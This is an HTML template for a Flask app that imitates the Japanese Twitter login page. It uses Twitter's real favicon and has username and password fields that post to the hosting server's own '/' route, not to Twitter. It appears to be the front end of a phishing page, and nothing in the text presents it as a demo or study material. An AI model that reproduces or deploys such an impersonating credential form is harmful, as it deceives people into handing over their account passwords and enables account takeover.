<!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" href="{{url_for("static", filename="css/index.css")}}">
    </head>
    <body>
        <div class="bg_test-text">
            <img src="https://abs.twimg.com/favicons/favicon.ico">
            <h1>Twitterにログイン</h1>
            <form action="/" method="POST">
            <p><input class="username-style" type="text" name="user" placeholder="電話、メールまたはユーザー名"></p>
            <p><input class="pwd-style" type="password" name="pwd" placeholder="パスワード"></p>
            <p><input class="submit-style" type="submit" name="submit" value="ログイン" class="button-color"></p>
            </form>
        </div>
    </body>
</html>